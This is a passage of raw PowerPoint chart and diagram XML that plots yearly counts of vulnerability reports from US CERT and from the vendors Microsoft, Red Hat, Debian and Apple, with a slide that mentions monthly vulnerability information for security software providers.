        <c:crossAx val="51110656"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:serAx>
        <c:axId val="49211584"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr rot="0" vert="horz"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Severity</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51112576"/>
        <c:crosses val="autoZero"/>
      </c:serAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/charts/chart2.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <c:date1904 val="1"/>
  <c:lang val="en-US"/>
  <c:style val="5"/>
  <c:chart>
    <c:title>
      <c:layout/>
    </c:title>
    <c:view3D>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:floor>
      <c:spPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="4F81BD">
                <a:tint val="66000"/>
                <a:satMod val="160000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="4F81BD">
                <a:tint val="44500"/>
                <a:satMod val="160000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="4F81BD">
                <a:tint val="23500"/>
                <a:satMod val="160000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
      </c:spPr>
    </c:floor>
    <c:sideWall>
      <c:spPr>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c:spPr>
    </c:sideWall>
    <c:backWall>
      <c:spPr>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c:spPr>
    </c:backWall>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="col"/>
        <c:grouping val="stacked"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$B$10</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Vulnerabilities Reported by US CERT</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$11:$A$18</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="8"/>
                <c:pt idx="0">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2001</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2002</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2003</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$B$11:$B$18</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="8"/>
                <c:pt idx="0">
                  <c:v>1090</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2437</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4129</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3784</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3780</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5990</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>8064</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7236</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:shape val="box"/>
        <c:axId val="51478528"/>
        <c:axId val="51480448"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="51478528"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Year</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51480448"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="51480448"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="8000"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51478528"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/charts/chart3.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <c:date1904 val="1"/>
  <c:lang val="en-US"/>
  <c:chart>
    <c:title>
      <c:layout/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$A$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Microsoft</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DF8045"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
          </c:spPr>
          <c:trendline>
            <c:spPr>
              <a:ln w="38100">
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
          </c:trendline>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$B$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$3:$D$3</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>91</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>148</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="51608960"/>
        <c:axId val="51648000"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="51608960"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Year</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51648000"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="51648000"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:minorGridlines/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Vulnerability Reports</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51608960"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr baseline="0">
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:pPr>
      <a:endParaRPr lang="en-US"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/charts/chart4.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <c:date1904 val="1"/>
  <c:lang val="en-US"/>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Hat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$A$4</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Red Hat</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DF8045"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
          </c:spPr>
          <c:trendline>
            <c:spPr>
              <a:ln w="38100">
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
          </c:trendline>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$B$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$4:$D$4</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>256</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>439</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>358</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="51685248"/>
        <c:axId val="51691520"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="51685248"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Year</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51691520"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="51691520"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:minorGridlines/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Vulnerability Reports</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51685248"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr baseline="0">
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:pPr>
      <a:endParaRPr lang="en-US"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/charts/chart5.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <c:date1904 val="1"/>
  <c:lang val="en-US"/>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0">
              <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$A$5</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Debian</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DF8045"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
          </c:spPr>
          <c:trendline>
            <c:spPr>
              <a:ln w="38100">
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
          </c:trendline>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$B$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$5:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>279</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>464</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>636</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="55599488"/>
        <c:axId val="55601408"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="55599488"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Year</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="55601408"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="55601408"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:minorGridlines/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Vulnerability Reports</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="55599488"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/charts/chart6.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <c:date1904 val="1"/>
  <c:lang val="en-US"/>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$A$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Apple</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="DF8045">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DF8045"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
          </c:spPr>
          <c:trendline>
            <c:spPr>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
          </c:trendline>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$B$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$7:$D$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>105</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>171</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>174</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="55626368"/>
        <c:axId val="55628544"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="55626368"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Year</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="55628544"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="55628544"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:minorGridlines/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="900" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0"/>
                  <a:t>Vulnerability Reports</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="55626368"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr baseline="0">
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:pPr>
      <a:endParaRPr lang="en-US"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
</c:chartSpace>
</file>

<file path=ppt/diagrams/_rels/data6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/></Relationships>
</file>

<file path=ppt/diagrams/colors1.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6D4E787-4EAE-4870-897C-C242601D1086}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_5" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:noFill/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="flat" dir="tl">
              <a:rot lat="0" lon="0" rev="6600000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="25400" contourW="8890">
            <a:bevelT w="38100" h="31750"/>
            <a:contourClr>
              <a:schemeClr val="accent2">
                <a:shade val="75000"/>
              </a:schemeClr>
            </a:contourClr>
          </a:sp3d>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0" smtClean="0"/>
            <a:t>Provides monthly vulnerability information to commercial  security software providers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{720F7B2E-1287-473F-9C7D-D477E9342C9F}" type="parTrans" cxnId="{E292308E-C5EB-4684-96F5-791E0DF93750}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{045BFF24-9A1D-4903-AFB8-C1ECF32B8688}" type="sibTrans" cxnId="{E292308E-C5EB-4684-96F5-791E0DF93750}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5064AF9-F416-40A2-8D07-10CD01255403}">
